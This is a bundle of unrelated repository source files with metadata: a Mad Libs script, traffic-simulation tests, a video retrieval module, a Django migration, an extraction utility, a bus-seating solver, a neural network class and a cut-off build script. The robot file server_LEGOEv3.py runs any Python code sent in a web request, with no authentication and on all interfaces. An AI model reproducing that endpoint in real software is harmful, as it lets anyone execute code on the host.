1a0ed5e4774201cd84513577f14e0c0f13e859bb | e88236a85d5b77f29b099cc72e2c87e8372eb7b1 | /Mad Lib.py | 21b10b456f4ad682ed1ad3401c0ec4d299cf6a77 | [] | no_license | BatistaAlexandre/Pyton_Projects | 8deabe8c3490280490a4297e0f5b100bff3a1cf7 | 9417bc5d82ee8b1bb5073e176b9f2fd17c2066ec | refs/heads/main | 2023-08-20T08:02:26.590472 | 2021-10-31T03:22:11 | 2021-10-31T03:22:11 | 417,197,904 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 696 | py | print("")
print("This is my frist Mad Libs project.")
print("")
name = ("Thomas")
adj1 = ("fighter")
adj2 = ("glutton")
activity1 = ("surgeries")
activity2 = ("washer")
activity3 = ("healing")
noun1 = ("farmer")
noun2 = ("chair")
noun4 = ("cars")
place1 = ("Alaska")
place2 = ("São Paulo")
print(name, " is a ", adj1, noun1, " who lives in ", place1, " and is from a ", adj2, " family. He lives with his ", noun2, " who is the breadwinner of the family. She earns ", noun4, " by ", activity1, " at Walmart. When ", name, "'s ", noun2, " has free time they ", activity2, " together and have fun ", activity3, "in", place2, ".")
print("")
print("What a beautiful story!")
| [
"[email protected]"
] | |
07f54fa8d55b5c899267c947394d094fc5b649a3 | ac5af893590d3f59663d040f50818989f5373c86 | /tests/test_experiment_base_class.py | 60fdaf57e09405899876fc987ff10247423027f0 | [
"MIT"
] | permissive | mark-koren/flow | a22891dfd8a3299e5ecdb8adb33aefb5a93fdba9 | f3f6d7e9c64f6b641a464a716c7f38ca00388805 | refs/heads/master | 2020-03-19T00:52:09.005880 | 2018-05-30T23:29:21 | 2018-05-30T23:29:21 | 135,506,693 | 0 | 0 | MIT | 2018-05-30T23:14:18 | 2018-05-30T23:14:17 | null | UTF-8 | Python | false | false | 2,080 | py | import unittest
import logging
from flow.core.experiment import SumoExperiment
from flow.core.params import SumoParams, EnvParams, InitialConfig, NetParams
from flow.core.vehicles import Vehicles
from flow.controllers.routing_controllers import ContinuousRouter
from flow.controllers.car_following_models import *
from flow.controllers.rlcontroller import RLController
from flow.envs.loop_accel import SimpleAccelerationEnvironment
from flow.scenarios.loop.gen import CircleGenerator
from flow.scenarios.loop.loop_scenario import LoopScenario
from setup_scripts import ring_road_exp_setup
class TestNumSteps(unittest.TestCase):
"""
Tests that experiment class runs for the number of steps requested.
"""
def setUp(self):
# create the environment and scenario classes for a ring road
env, scenario = ring_road_exp_setup()
# instantiate an experiment class
self.exp = SumoExperiment(env, scenario)
def tearDown(self):
# free up used memory
self.exp = None
def runTest(self):
self.exp.run(num_runs=1, num_steps=10)
self.assertEqual(self.exp.env.timer, 10)
class TestNumRuns(unittest.TestCase):
"""
Tests that the experiment class properly resets as many times as requested,
after the correct number of iterations.
"""
def runTest(self):
# run the experiment for 1 run and collect the last position of all
# vehicles
env, scenario = ring_road_exp_setup()
exp = SumoExperiment(env, scenario)
exp.run(num_runs=1, num_steps=10)
pos1 = [exp.env.vehicles.get_speed()]
# run the experiment for 2 runs and collect the last position of all
# vehicles
env, scenario = ring_road_exp_setup()
exp = SumoExperiment(env, scenario)
exp.run(num_runs=2, num_steps=10)
pos2 = [exp.env.vehicles.get_speed()]
# check that the final position is the same in both instances
np.testing.assert_array_almost_equal(pos1, pos2)
if __name__ == '__main__':
unittest.main()
| [
"[email protected]"
] | |
8db382600a6c2222a8a6ea6b955040db65f761e6 | 8677cb237360646e893e6aa1949d0e3a2d5acee5 | /server/dvaapp/operations/retrieval.py | a062d97b87d08a68d9bc403f83bb0d449b63ab9a | [
"BSD-3-Clause",
"Apache-2.0",
"MIT"
] | permissive | hitlk/DeepVideoAnalytics | b92f39c1552aa239d1eb98b051a3ca86b96059b9 | c6893b3eb5855430c1267a6d6f0a6a168b89fe94 | refs/heads/master | 2020-03-22T17:39:00.160352 | 2018-07-10T08:30:02 | 2018-07-10T08:30:02 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,158 | py | import logging
from .approximation import Approximators
from .indexing import Indexers
from collections import defaultdict
try:
from dvalib import indexer, retriever
import numpy as np
except ImportError:
np = None
logging.warning("Could not import indexer / clustering assuming running in front-end mode")
from ..models import IndexEntries, QueryResult, Region, Retriever
class Retrievers(object):
_visual_retriever = {}
_retriever_object = {}
_index_count = defaultdict(int)
@classmethod
def get_retriever(cls, retriever_pk):
if retriever_pk not in cls._visual_retriever:
dr = Retriever.objects.get(pk=retriever_pk)
cls._retriever_object[retriever_pk] = dr
if dr.algorithm == Retriever.EXACT and dr.approximator_shasum and dr.approximator_shasum.strip():
approximator, da = Approximators.get_approximator_by_shasum(dr.approximator_shasum)
da.ensure()
approximator.load()
cls._visual_retriever[retriever_pk] = retriever.BaseRetriever(name=dr.name, approximator=approximator)
elif dr.algorithm == Retriever.EXACT:
cls._visual_retriever[retriever_pk] = retriever.BaseRetriever(name=dr.name)
elif dr.algorithm == Retriever.FAISS and dr.approximator_shasum is None:
di = Indexers.get_indexer_by_shasum(dr.indexer_shasum)
cls._visual_retriever[retriever_pk] = retriever.FaissFlatRetriever(name=dr.name,
components=di.arguments[
'components'])
elif dr.algorithm == Retriever.FAISS:
approximator, da = Approximators.get_approximator_by_shasum(dr.approximator_shasum)
da.ensure()
approximator.load()
cls._visual_retriever[retriever_pk] = retriever.FaissApproximateRetriever(name=dr.name,
approximator=approximator)
elif dr.algorithm == Retriever.LOPQ:
approximator, da = Approximators.get_approximator_by_shasum(dr.approximator_shasum)
da.ensure()
approximator.load()
cls._visual_retriever[retriever_pk] = retriever.LOPQRetriever(name=dr.name,
approximator=approximator)
else:
raise ValueError("{} not valid retriever algorithm".format(dr.algorithm))
return cls._visual_retriever[retriever_pk], cls._retriever_object[retriever_pk]
@classmethod
def refresh_index(cls, dr):
# TODO improve this by either having a separate broadcast queues or using redis
last_count = cls._index_count[dr.pk]
current_count = IndexEntries.objects.count()
visual_index = cls._visual_retriever[dr.pk]
if last_count == 0 or last_count != current_count or len(visual_index.loaded_entries) == 0:
cls._index_count[dr.pk] = current_count
cls.update_index(dr)
@classmethod
def update_index(cls, dr):
source_filters = dr.source_filters.copy()
# Only select entries with completed events, otherwise indexes might not be synced or complete.
source_filters['event__completed'] = True
if dr.indexer_shasum:
source_filters['indexer_shasum'] = dr.indexer_shasum
if dr.approximator_shasum:
source_filters['approximator_shasum'] = dr.approximator_shasum
else:
source_filters['approximator_shasum'] = None # Required otherwise approximate index entries are selected
index_entries = IndexEntries.objects.filter(**source_filters)
visual_index = cls._visual_retriever[dr.pk]
for index_entry in index_entries:
if index_entry.pk not in visual_index.loaded_entries and index_entry.count > 0:
if visual_index.algorithm == "LOPQ":
vectors, entries = index_entry.load_index()
logging.info("loading approximate index {}".format(index_entry.pk))
visual_index.load_index(None,entries,index_entry.video_id,index_entry.target)
visual_index.loaded_entries.add(index_entry.pk)
elif visual_index.algorithm == 'FAISS':
index_file_path, entries = index_entry.load_index()
logging.info("loading FAISS index {}".format(index_entry.pk))
visual_index.load_index(index_file_path, entries, index_entry.video_id, index_entry.target)
visual_index.loaded_entries.add(index_entry.pk)
else:
vectors, entries = index_entry.load_index()
logging.info("Starting {} in {} with shape {}".format(index_entry.video_id, visual_index.name,
vectors.shape))
try:
visual_index.load_index(vectors, entries, index_entry.video_id, index_entry.target)
visual_index.loaded_entries.add(index_entry.pk)
except:
logging.info("ERROR Failed to load {} vectors shape {} entries {}".format(
index_entry.video_id, vectors.shape, len(entries)))
else:
logging.info("finished {} in {}".format(index_entry.pk, visual_index.name))
@classmethod
def retrieve(cls, event, retriever_pk, vector, count, region_pk=None):
index_retriever, dr = cls.get_retriever(retriever_pk)
cls.refresh_index(dr)
results = index_retriever.nearest(vector=vector, n=count)
qr_batch = []
for rank, r in enumerate(results):
qr = QueryResult()
if region_pk:
qr.query_region_id = region_pk
qr.query = event.parent_process
qr.retrieval_event_id = event.pk
if r['type'] == 'regions':
dd = Region.objects.get(pk=r['id'])
qr.region = dd
qr.frame_index = dd.frame_index
qr.video_id = dd.video_id
elif r['type'] == 'frames':
qr.frame_index = int(r['id'])
qr.video_id = r['video']
else:
raise ValueError("No key found {}".format(r))
qr.algorithm = dr.algorithm
qr.rank = int(r.get('rank', rank+1))
qr.distance = int(r.get('dist', rank+1))
qr_batch.append(qr)
if region_pk:
event.finalize_query({"QueryResult":qr_batch},results={region_pk:{"retriever_state":index_retriever.findex}})
else:
event.finalize_query({"QueryResult":qr_batch},results={"retriever_state":index_retriever.findex})
event.parent_process.results_available = True
event.parent_process.save()
return 0
| [
"[email protected]"
] | |
2913688c07ba663536d12729e1d5735c2330e5eb | 2fd39a6995f86189ac39bc93081afba587247c2c | /products/migrations/0001_initial.py | 424d5755a51054af73aa688ed9134b5a7ebf538b | [
"Apache-2.0"
] | permissive | Garendat/django_example_shop | 370352d75ae92e74d4e866a9fe5dac9833c22175 | a9af913ea3870e6b625a02938e82bda4d4539633 | refs/heads/master | 2020-03-19T20:29:37.317019 | 2018-06-11T17:55:18 | 2018-06-11T17:55:18 | 136,904,530 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,016 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.3 on 2018-05-30 22:36
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Product',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(blank=True, default=None, max_length=64, null=True)),
('description', models.TextField(blank=True, default=None, null=True)),
('is_active', models.BooleanField(default=True)),
('created', models.DateTimeField(auto_now_add=True)),
('updated', models.DateTimeField(auto_now=True)),
],
options={
'verbose_name': 'Товар',
'verbose_name_plural': 'Товары',
},
),
]
| [
"[email protected]"
] | |
857abb3fb8b1d73b1ac3d00c9cf609163be80efb | 35c4aa0e912c9b6e8543f032edd52bb78fa752ef | /ParteReal/server_LEGOEv3.py | 0d461d71b27ec67d03c8a009107fddded711922d | [] | no_license | RoboticsLabURJC/2020-tfg-daniel-pulido | 81c3c6b514a5d61bc3392feafdf66406a1ef7956 | a6da755227e547fff63452fda214544c438ff812 | refs/heads/master | 2021-07-25T16:34:36.891382 | 2020-12-25T19:05:31 | 2020-12-25T19:05:31 | 233,579,467 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,139 | py | import subprocess
import os
import signal
import time
from flask import Flask, make_response, request
app = Flask(__name__)
exercice = None
@app.route('/run',methods=["GET"])
def run_program():
global exercice
code = request.args.get('python_code')
print(code)
# Stop process have already up
if exercice:
try:
os.killpg(os.getpgid(exercice.pid), signal.SIGKILL)
except ProcessLookupError:
pass
time.sleep(2)
# Creat exercice.py
code = code[1:-1].split("\\n")
fdOut = open("./ejercicio.py","w")
for line in code:
fdOut.write(line + "\n")
# Run process
exercice = subprocess.Popen(["python","ejercicio.py"],stdout=subprocess.PIPE,preexec_fn=os.setsid)
headers = {'Content-Type': 'text/plain','Access-Control-Allow-Origin': '*'}
return make_response('Ok', 200,headers)
# ----------------------------------------------------------------------
# MAIN PROGRAM
# ----------------------------------------------------------------------
if __name__ == "__main__":
app.run(host='0.0.0.0', port=8001, debug=True)
| [
"[email protected]"
] | |
ee2844486c8fd3c2eeb7fe051384ec757b33fffd | 36553cda80a53dae03d9172c139901b461c8820c | /diff_content_extraction/base.py | 516d322783fa88a8f467dda695e128ab0d908bcc | [] | no_license | JointEntropy/diff_content_extraction | 5a68dba16c1b0fe74a1de9843663e6c19db21fcc | 3b8b9828e1e95d02c4a8db1e5d3408635d3c59d4 | refs/heads/master | 2023-07-07T15:45:40.469605 | 2021-08-08T16:37:27 | 2021-08-08T16:37:27 | 393,965,246 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,447 | py | from functools import lru_cache
from tqdm import tqdm
from itertools import chain, product, combinations
from collections import Counter, defaultdict
import pandas as pd
from lxml import html, etree
import os
from diff_content_extraction.attribute_extraction import extract_attribs
from diff_content_extraction.xpath_utils import find_ancestor_node
def flat_xpaths_attrs(lst):
for l in lst:
for k in l:
xpath = k['xpath']
for attr in k['attribs']:
yield (xpath, attr)
def collect_xpath_texts(xpath, node):
if 'script' in xpath:
return set()
texts_set = set()
for find_node in node.xpath(xpath):
if getattr(find_node, 'text') and find_node.text.strip():
texts_set.add(find_node.text)
return texts_set
def jaccard(a, b):
return len(a & b) / len(a | b)
def compare_xpath_entities(xpath, node1, node2):
a_set = collect_xpath_texts(xpath, node1)
b_set = collect_xpath_texts(xpath, node2)
if len(a_set) == 0:
return False
if abs(jaccard(a_set, b_set)) < 0.05:
return True
return False
def extract_pairwise_paths(dataset):
parse_html = lru_cache(html.fromstring)
results_lst = []
for a, b in tqdm(product(dataset.keys(), dataset.keys()), total=int(len(dataset) ** 2)):
if a == b:
continue
r1_dom = parse_html(dataset[a]['html'])
r2_dom = parse_html(dataset[b]['html'])
tree = etree.ElementTree(r1_dom)
collected_xpaths = []
for e in r1_dom.iter():
pth = tree.getpath(e)
if compare_xpath_entities(pth, r1_dom, r2_dom):
attribs = extract_attribs(pth, r1_dom, min_support=0.5)
collected_xpaths.append(dict(xpath=pth, attribs=attribs))
results_lst.append(dict(a=a, b=b, xpaths=collected_xpaths))
res_df = pd.DataFrame(results_lst)
return res_df
def extract_dataset(items_iter):
"""
Формирует датасет из данныз соскрапленных страниц
"""
pages_data = []
for t in items_iter:
pages_data.append(dict(url=t['_id'], html=t['html']))
pages_df = pd.DataFrame(pages_data)
# pages_df = pages_df[pages_df['url'].apply(lambda x: 'https://topliba.com/books/' in x)]
dataset = pages_df.set_index('url').to_dict('index')
return dataset
def extract_stable_xpaths_data(pairwise_paths, min_support=0.):
# counts = Counter(list(chain.from_iterable(pairwise_paths['xpaths'])))
counts = Counter(list(flat_xpaths_attrs(pairwise_paths['xpaths'])))
stat_df = pd.DataFrame([dict(path=k, count=v) for k, v in counts.items()])
stat_df['total'] = pairwise_paths.shape[0]
stat_df['normalized'] = stat_df['count'] / stat_df['total']
stat_df['root'] = stat_df['path'].apply(lambda x: find_ancestor_node(x[0]))
stat_df['root_total'] = stat_df.groupby('root')['count'].transform(sum)
stat_df['root_total_normalized'] = stat_df['root_total'] / stat_df['total']
# TODO здесь ошибки со перекрытием подсчёта количества count_total может быть > total
msk = (stat_df['root_total_normalized'] > min_support) | (stat_df['normalized'] > min_support)
filtered_paths = stat_df.loc[msk, 'path'].tolist()
result = defaultdict(list)
for k in filtered_paths:
result[k[0]].append(k[1])
return result
| [
"[email protected]"
] | |
1a636a55e34e6cc9d3fd4c0e903a12ec085870a7 | 6cb25961b9aecf0470c6653fc2f01e11a3196b00 | /Tugas Aplikasi 5 Latihan A.py | 33b5e9af415f9b2c83ccabeb168636596090d9bd | [] | no_license | Zaenil/Tugas-Aplikasi-2-RS-20083000189-Zaenil-Muttakin | d6bf233b7e804a2c2005d742f2062650f0984dc7 | bc7d5ea2cb7090a05bba16ac9fa2c5432a9b35d5 | refs/heads/main | 2023-05-19T10:09:00.542695 | 2021-06-11T18:49:25 | 2021-06-11T18:49:25 | 376,114,596 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 364 | py | # -*- coding: utf-8 -*-
"""
Created on Fri Jun 11 16:30:40 2021
@author: Nik
"""
#Tugas aplikasi 5 Latihan A
print("#####################################")
print (" Status Kelulusan Mahasiswa")
print("#####################################")
N=input("Masukan Nilai Kelulusan = ")
if int(N)>60 :
print("Lulus")
else :
print("Tidak Lulus")
| [
"[email protected]"
] | |
9d512ec6a49ff05ecdb9e912ad33a4fc7f4de9c7 | cd247a27b167d510193852a781af15b9ad007b5d | /integration_tests/test_runway_module_type_detection/tests/test_suffix_type_k8s.py | 9c8c6b15d1dd84c5a452c93efac5bdf57add49d4 | [
"Apache-2.0"
] | permissive | edgarpoce/runway | 0759f70429f384b60a85008a5954ae18e593e9aa | 94aebff4f83b294653192a1b74111f6a9f114de2 | refs/heads/master | 2021-07-09T07:45:04.476229 | 2020-04-04T04:08:07 | 2020-04-04T04:08:07 | 226,101,470 | 1 | 0 | Apache-2.0 | 2019-12-05T12:50:53 | 2019-12-05T12:50:53 | null | UTF-8 | Python | false | false | 1,048 | py | """Test to verify behavior of directory suffix based type"""
import subprocess
from runway.util import change_dir
from integration_tests.test_runway_module_type_detection.test_runway_module_type_detection import (
RunwayModuleTypeDetection
)
class TestSuffixTypeK8S(RunwayModuleTypeDetection):
"""Test to verify a 'type' directory suffix 'k8s' is respected."""
TEST_NAME = __name__
def deploy(self):
"""Deploy provider."""
self.copy_fixture('sampleapp.k8s')
self.copy_runway('suffix-k8s')
with change_dir(self.mtd_test_dir):
out = subprocess.check_output(['runway', 'deploy'], stderr=subprocess.STDOUT)
return 0 if "No kustomize overlay for this environment" in out.decode() else -1
def run(self):
"""Run tests."""
self.clean()
assert self.deploy() == 0, '{}:Directory Suffix Type CDK Failed'.format(__name__)
def teardown(self):
"""Teardown."""
self.logger.info('Tearing down: %s', self.TEST_NAME)
self.clean()
| [
"[email protected]"
] | |
6736d192fe32d725c5d30bc50171e22e11797883 | 8472354323e12efce848fdee3d117f0c8d5e4dcc | /largesolver4.py | edbcbf08a05f6ed0927dc58bd8b5254aca7f1039 | [] | no_license | julianjic/170processing | 305f976522379ad6b402c157a980c73db18b1e88 | 86b15f7ae91bcd2bd3071e4d20c887301864b0b4 | refs/heads/master | 2020-04-09T04:14:40.116445 | 2018-12-02T18:58:09 | 2018-12-02T18:58:09 | 160,015,454 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 13,429 | py | import networkx as nx
import os
###########################################
# Change this variable to the path to
# the folder containing all three input
# size category folders
###########################################
path_to_inputs = "./all_inputs"
###########################################
# Change this variable if you want
# your outputs to be put in a
# different folder
###########################################
path_to_outputs = "./outputs"
def parse_input(folder_name):
'''
Parses an input and returns the corresponding graph and parameters
Inputs:
folder_name - a string representing the path to the input folder
Outputs:
(graph, num_buses, size_bus, constraints)
graph - the graph as a NetworkX object
num_buses - an integer representing the number of buses you can allocate to
size_buses - an integer representing the number of students that can fit on a bus
constraints - a list where each element is a list vertices which represents a single rowdy group
'''
graph = nx.read_gml(folder_name + "/graph.gml")
graph.remove_edges_from(graph.selfloop_edges())
parameters = open(folder_name + "/parameters.txt")
num_buses = int(parameters.readline())
size_bus = int(parameters.readline())
constraints = []
for line in parameters:
line = line[1: -2]
curr_constraint = [num.replace("'", "") for num in line.split(", ")]
constraints.append(curr_constraint)
return graph, num_buses, size_bus, constraints
def solve(graph, num_buses, size_bus, constraints):
#TODO: Write this method as you like. We'd recommend changing the arguments here as well
#Inputs: graph, num_buses, size_bus, constraints
#Heuristic Order #1
rowdy_number = {}
for rowdy_list in constraints:
for student in rowdy_list:
if student in rowdy_number:
rowdy_number[student] += 1
else:
rowdy_number[student] = 1
for student in graph.nodes():
if student not in rowdy_number:
rowdy_number[student] = 0
# print(len(rowdy_number))
#Heuristic Order #2
semi_popular_students = {}
for student in graph.nodes():
if graph.degree[student] <= size_bus:
semi_popular_students[student] = graph.degree()[student]
for student in graph.nodes():
if student not in semi_popular_students:
semi_popular_students[student] = 0
#Heuristic Order # 3
most_popular_students = {}
for student in graph.nodes():
most_popular_students[student] = graph.degree()[student]
# print(len(most_popular_students))
#Preprocessing of G' where G' is G, but without edges found in constraints
graph_prime = graph.copy()
#for student1 in graph_prime.nodes:
# for student2 in graph_prime.nodes:
# if graph_prime.has_edge(student1, student2):
# graph_prime[student1][student2]['weight'] = 1
# print(graph_prime[student1][student2]['weight'])
for edge in graph_prime.edges():
graph_prime[edge[0]][edge[1]]['weight'] = 1
for rowdy_list in constraints:
for student1 in rowdy_list:
for student2 in rowdy_list:
if graph_prime.has_edge(student1, student2):
graph_prime[student1][student2]['weight'] = 2
else:
graph_prime.add_edge(student1, student2)
graph_prime[student1][student2]['weight'] = 2
#Process Heuristics on G and G'
points1, buses1 = heuristic_one(graph_prime, num_buses, size_bus, constraints, rowdy_number)
points2, buses2 = heuristic_two(graph_prime, num_buses, size_bus, constraints, semi_popular_students)
points3, buses3 = heuristic_three(graph_prime, num_buses, size_bus, constraints, most_popular_students)
#points4, buses4 = heuristic_four(graph_prime, num_buses, size_bus, constraints)
#Do Optimization (AKA swapping students for specific amount of iterations!)
points1, buses1 = non_empty_bus_organizer(graph_prime, buses1, rowdy_number)
points2, buses2 = non_empty_bus_organizer(graph_prime, buses2, semi_popular_students)
points3, buses3 = non_empty_bus_organizer(graph_prime, buses3, most_popular_students)
#points4, buses4 = non_empty_bus_organizer(graph_prime, buses4, most_popular_students)
points1, buses1 = switch_optimizer(graph_prime, buses1, size_bus)
points2, buses2 = switch_optimizer(graph_prime, buses2, size_bus)
points3, buses3 = switch_optimizer(graph_prime, buses3, size_bus)
#points4, buses4 = switch_optimizer(graph_prime, buses4, size_bus)
#Compare Results
best_result = max(points1, points2, points3)
# best_result = max(points1, points3)
if (best_result == points1):
best_buses = buses1
elif (best_result == points2):
best_buses = buses2
elif (best_result == points3):
best_buses = buses3
#Create .out output_file
return best_buses
def switch_optimizer(graph_prime, buses, size_bus):
have_not_covered_all_students = True
while (have_not_covered_all_students):
switched = switcher(graph_prime, buses, size_bus)
if (switched != True):
have_not_covered_all_students = False
overall_score = 0
for bus in buses:
overall_score += bus_score(graph_prime, bus)
return overall_score, buses
def switcher(graph_prime, buses, size_bus):
for student in graph_prime:
original_bus = find_bus(student, buses)
original_bus_score = bus_score(graph_prime, original_bus)
leave_bus = original_bus.copy()
leave_bus.remove(student)
leave_bus_score = bus_score(graph_prime, leave_bus)
for bus in buses:
if len(bus) < size_bus:
current_bus = bus.copy()
current_bus_score_alone = bus_score(graph_prime, current_bus)
current_bus.append(student)
current_score = bus_score(graph_prime, current_bus)
leaving_total = original_bus_score + current_bus_score_alone
entering_total = current_score + leave_bus_score
if (current_score + leave_bus_score > original_bus_score + current_bus_score_alone):
original_bus.remove(student)
bus.append(student)
return True
return False
def find_bus(student, buses):
for bus in buses:
if student in bus:
return bus
#def individual_bus_scores(graph_prime, buses):
# amortized = {}
# for bus in buses:
# score = bus_score(graph_prime, bus)
# amortized[bus.string()] = score
# return amortized
#Makes sure that a bus will not remain empty after the initial heuristics dictionaries are implemented
def non_empty_bus_organizer(graph_prime, buses, dictionary):
loner = ''
blacklist = []
for bus1 in buses:
if len(bus1) == 0:
for bus2 in buses:
if bool(dictionary) == False:
break
if list(dictionary.keys())[0] in bus2 and list(dictionary.keys())[0] not in blacklist:
loner = list(dictionary.keys())[0]
bus2.remove(list(dictionary.keys())[0])
bus1.append(loner)
blacklist.append(loner)
dictionary.pop(loner)
break
overall_score = 0
for bus in buses:
overall_score += bus_score(graph_prime, bus)
return overall_score, buses
def heuristic_one(graph_prime, num_buses, size_bus, constraints, rowdy_number):
#Sort students into buses
buses = [[] for _ in range(num_buses)]
best_bus = 0
best_score = 0
for student in sorted(rowdy_number, key=rowdy_number.get, reverse=True):
for bus_num in range(num_buses):
if (len(buses[bus_num]) >= size_bus):
pass
else:
current_bus = buses[bus_num].copy()
current_bus.append(student)
current_score = bus_score(graph_prime, current_bus)
if (current_score >= best_score):
best_bus = bus_num
best_score = current_score
buses[best_bus].append(student)
#Create an overall score based on the bus list created, then returns it.
overall_score = 0
for bus in buses:
overall_score += bus_score(graph_prime, bus)
return overall_score, buses
def heuristic_two(graph_prime, num_buses, size_bus, constraints, semi_popular_students):
buses = [[] for _ in range(num_buses)]
best_bus = 0
best_score = 0
for student in sorted(semi_popular_students, key=semi_popular_students.get, reverse=True):
for bus_num in range(num_buses):
if (len(buses[bus_num]) >= size_bus):
pass
else:
current_bus = buses[bus_num].copy()
current_bus.append(student)
current_score = bus_score(graph_prime, current_bus)
if (current_score >= best_score):
best_bus = bus_num
best_score = current_score
buses[best_bus].append(student)
#Create an overall score based on the bus list created, then returns it.
overall_score = 0
for bus in buses:
overall_score += bus_score(graph_prime, bus)
return overall_score, buses
def heuristic_three(graph_prime, num_buses, size_bus, constraints, most_popular_students):
buses = [[] for _ in range(num_buses)]
best_bus = 0
best_score = 0
for student in sorted(most_popular_students, key=most_popular_students.get, reverse=True):
for bus_num in range(num_buses):
if (len(buses[bus_num]) >= size_bus):
pass
else:
current_bus = buses[bus_num].copy()
current_bus.append(student)
current_score = bus_score(graph_prime, current_bus)
if (current_score >= best_score):
best_bus = bus_num
best_score = current_score
buses[best_bus].append(student)
#Create an overall score based on the bus list created, then returns it.
overall_score = 0
for bus in buses:
overall_score += bus_score(graph_prime, bus)
return overall_score, buses
def heuristic_four(graph_prime, num_buses, size_bus, constraints):
buses = [[] for _ in range(num_buses)]
chunk = len(graph_prime.nodes()) // num_buses
leftover = len(graph_prime.nodes()) // chunk
end = chunk
start = 0
students = []
for student in graph_prime.nodes():
students.append(student)
for bus in buses:
for x in range(start, end):
bus.append(students[x])
start += chunk
end += chunk
print(buses)
#Create an overall score based on the bus list created, then returns it.
overall_score = 0
for bus in buses:
overall_score += bus_score(graph_prime, bus)
print(overall_score)
return overall_score, buses
def bus_score(graph_prime, bus):
score = 0
for student1 in range(len(bus)):
for student2 in range(student1+1, len(bus)):
if graph_prime.has_edge(student1, student2) and graph_prime[student1][student2]['weight'] == 1:
score += 1
#print(score)
return score
def attendance(buses):
count = 0
for bus in buses:
count += len(bus)
# print(count)
def main():
'''
Main method which iterates over all inputs and calls `solve` on each.
The student should modify `solve` to return their solution and modify
the portion which writes it to a file to make sure their output is
formatted correctly.
'''
size_categories = ["large4"]
if not os.path.isdir(path_to_outputs):
os.mkdir(path_to_outputs)
for size in size_categories:
category_path = path_to_inputs + "/" + size
output_category_path = path_to_outputs + "/" + size
category_dir = os.fsencode(category_path)
if not os.path.isdir(output_category_path):
os.mkdir(output_category_path)
for input_folder in os.listdir(category_dir):
input_name = os.fsdecode(input_folder)
#if (input_name == '100'):
graph, num_buses, size_bus, constraints = parse_input(category_path + "/" + input_name)
solution = solve(graph, num_buses, size_bus, constraints)
output_file = open(output_category_path + "/" + input_name + ".out", "w")
#TODO: modify this to write your solution to your
# file properly as it might not be correct to
# just write the variable solution to a file
seat = 1
for bus in solution:
output_file.write("[")
for student in bus:
if (seat != 1):
output_file.write(", '" + student + "'")
if (seat == 1):
output_file.write("'" + student + "'")
seat += 1
seat = 1
output_file.write("]\n")
output_file.close()
print("Completed " + input_name)
if __name__ == '__main__':
main()
| [
"[email protected]"
] | |
01290f806f555249284f5a1a8498ff5bc424695a | 66004eee30e5c750cd551c65149685e90809d920 | /src/two_layer_net.py | a66086ce40f96baf7add9750426c5cb25eea19c6 | [] | no_license | takya810/Hitoto | 434dcc5aa93a14af89d14ba3808e345d13823d06 | fcc794f90ee83d5fec0fc3e087e9c0d550477ac7 | refs/heads/master | 2021-01-22T08:47:47.570465 | 2017-06-14T14:17:36 | 2017-06-14T14:17:36 | 92,634,044 | 0 | 0 | null | 2017-06-14T14:17:37 | 2017-05-28T01:49:20 | null | UTF-8 | Python | false | false | 2,547 | py | # coding: utf-8
import sys, os
sys.path.append(os.pardir) # 親ディレクトリのファイルをインポートするための設定
import numpy as np
from common.layers import *
from common.gradient import numerical_gradient
from collections import OrderedDict
class TwoLayerNet:
def __init__(self, input_size, hidden_size, output_size, weight_init_std = 0.01):
# 重みの初期化
self.params = {}
self.params['W1'] = weight_init_std * np.random.randn(input_size, hidden_size)
self.params['b1'] = np.zeros(hidden_size)
self.params['W2'] = weight_init_std * np.random.randn(hidden_size, output_size)
self.params['b2'] = np.zeros(output_size)
# レイヤの生成
self.layers = OrderedDict()
self.layers['Affine1'] = Affine(self.params['W1'], self.params['b1'])
self.layers['Relu1'] = Relu()
self.layers['Affine2'] = Affine(self.params['W2'], self.params['b2'])
self.lastLayer = SoftmaxWithLoss()
def predict(self, x):
for layer in self.layers.values():
x = layer.forward(x)
return x
# x:入力データ, t:教師データ
def loss(self, x, t):
y = self.predict(x)
return self.lastLayer.forward(y, t)
def accuracy(self, x, t):
y = self.predict(x)
y = np.argmax(y, axis=1)
if t.ndim != 1 : t = np.argmax(t, axis=1)
accuracy = np.sum(y == t) / float(x.shape[0])
return accuracy
# x:入力データ, t:教師データ
def numerical_gradient(self, x, t):
loss_W = lambda W: self.loss(x, t)
grads = {}
grads['W1'] = numerical_gradient(loss_W, self.params['W1'])
grads['b1'] = numerical_gradient(loss_W, self.params['b1'])
grads['W2'] = numerical_gradient(loss_W, self.params['W2'])
grads['b2'] = numerical_gradient(loss_W, self.params['b2'])
return grads
def gradient(self, x, t):
# forward
self.loss(x, t)
# backward
dout = 1
dout = self.lastLayer.backward(dout)
layers = list(self.layers.values())
layers.reverse()
for layer in layers:
dout = layer.backward(dout)
# 設定
grads = {}
grads['W1'], grads['b1'] = self.layers['Affine1'].dW, self.layers['Affine1'].db
grads['W2'], grads['b2'] = self.layers['Affine2'].dW, self.layers['Affine2'].db
return grads
| [
"[email protected]"
] | |
26d153174133a79de9a7b6c4495f8cf437a24bfc | 2bb90b620f86d0d49f19f01593e1a4cc3c2e7ba8 | /pardus/tags/2008-EOL/applications/multimedia/mpg123/actions.py | ccae8d836dcedb07abd6404326ce95dae81cccb8 | [] | no_license | aligulle1/kuller | bda0d59ce8400aa3c7ba9c7e19589f27313492f7 | 7f98de19be27d7a517fe19a37c814748f7e18ba6 | refs/heads/master | 2021-01-20T02:22:09.451356 | 2013-07-23T17:57:58 | 2013-07-23T17:57:58 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 634 | py | #!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright 2005-2008 TUBITAK/UEKAE
# Licensed under the GNU General Public License, version 2.
# See the file http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt
from pisi.actionsapi import autotools
from pisi.actionsapi import pisitools
def setup():
